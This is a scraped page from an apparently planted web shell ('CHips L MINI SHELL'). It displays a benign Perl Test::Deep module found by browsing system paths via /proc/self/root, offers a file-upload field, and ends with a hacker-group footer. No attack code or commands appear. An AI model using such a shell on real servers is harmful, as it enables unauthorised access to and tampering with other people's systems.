CHips L MINI SHELL

CHips L pro

Current Path : /proc/self/root/proc/2/root/usr/local/share/perl5/Test/Deep/
Upload File :
Current File : //proc/self/root/proc/2/root/usr/local/share/perl5/Test/Deep/RegexpRefOnly.pm

use strict;
use warnings;

package Test::Deep::RegexpRefOnly;

use Test::Deep::Ref;

sub init
{
  my $self = shift;

  my $val = shift;

  $self->{val} = $val;
}

sub descend
{
  my $self = shift;

  my $got = shift;

  my $exp = $self->{val};

  return $got eq $exp;
}

sub render_stack
{
  my $self = shift;
  my ($var, $data) = @_;

  return "m/$var/";
}

sub renderGot
{
  my $self = shift;

  return shift()."";
}

1;

Copyright 2K16 - 2K18 Indonesian Hacker Rulez